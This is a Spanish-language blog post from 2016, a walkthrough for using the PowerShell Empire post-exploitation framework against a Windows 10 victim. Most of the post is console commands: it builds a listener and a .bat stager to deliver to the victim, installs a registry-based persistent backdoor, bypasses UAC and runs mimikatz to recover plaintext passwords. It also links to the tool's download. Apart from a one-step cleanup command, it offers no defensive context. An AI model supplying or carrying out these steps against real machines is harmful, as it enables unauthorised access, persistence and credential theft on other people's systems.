sábado, 1 de octubre de 2016

POWERSHELL EMPIRE: Backdoor Persistente, Bypass AV, Elevar Permisos y Contraseñas en plano W10

Definición:

Empire es un agente de post-explotación pura PowerShell se basa en comunicaciones cripto-seguras y una arquitectura flexible.

Empire implementa la capacidad de ejecutar agentes PowerShell sin necesidad de powershell.exe, contiene módulos de post-explotación de despliegue rápido, que van desde los registradores de claves para Mimikatz hasta los de comunicaciones adaptables para evadir la detección de red, todo ello envuelto en un marco centrado usabilidad. Se estrenó en BSidesLV en 2015.

Para instalarlo:

    ./setup/install.sh

Requisitos:


    Distribución Linux (Atacante)
    Empire
    Windows 10 (Víctima)
    Probado en: Windows 10 x64

      Backdoor Persistente:

      1- Abrimos EMPIRE con:

          ./empire

      2- Creamos un Listenner (Es un componente que espera a una conexión entrante de algún tipo)


        listeners
        set Name [Nombre del Listener]
        execute
        list (Para comprobar que se ha creado)

          3- Creamos un agente


            agents
            usestager launcher_bat
            info (Para ver información sobre launcher_bat)
            set Listener [El que hemos creado anteriormente]
            set OutFile [Ruta donde se guardará el archivo .bat]
            execute

              4- Pasamos el agente a nuestra víctima, y al ejecutarlo se nos abrirá una sesión. Para ver la sesión:


                agents
                list

                  5- Crear backdoor Persistente
                  interact [Nombre del agante]

                    usemodule persistence/userland/registry
                    info
                    set Listener [Nombre del listener que hemos creado anteriormente]
                    execute


                      6- Reiniciamos nuestro Windows 10 y nos logeamos, nos saldrá un nuevo agente con el que podremos interactuar.

                      El backdoor lo podemos encontrar en el regedit en la ruta: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion






                      7- Para eliminar la persistencia, interactuamos con el nuevo agente y:


                        info
                        usemodule persistence/userland/registry
                        info
                        set Cleanup true
                        execute

                          Elevar permisos y sacar las contraseñas en texto plano con mimikatz:


                          1- Abrimos EMPIRE con:

                              ./empire

                          2- Creamos un Listenner


                            listeners
                            set Name [Nombre del Listener]
                            execute
                            list (Para comprobar que se ha creado)

                              3- Creamos un agente

                                agents
                                usestager launcher_bat
                                info (Para ver información sobre launcher_bat)
                                set Listener [El que hemos creado anteriormente]
                                set OutFile [Ruta donde se guardará el archivo .bat]
                                execute

                                  4- Pasamos el agente a nuestra víctima, y al ejecutarlo se nos abrirá una sesión. Para ver la sesión:

                                    agents
                                    list

                                      Una vez teniendo un agente disponible interacutamos con el:
                                      interact [Nombre del agante]

                                        bypassuac
                                        agents
                                        list
                                        interact [Nombre del agente nuevo creado]
                                        mimikatz

                                          Detección Antivirus:

                                          Descarga:

                                          https://github.com/PowerShellEmpire/Empire.git

                                          Vídeos:

                                          Backdoor Persistente:

                                          Elevar permisos y sacar las contraseñas en texto plano con mimikatz:

                                           

                                          Previous Post
                                          Next Post

                                          post written by:

                                          2 comentarios: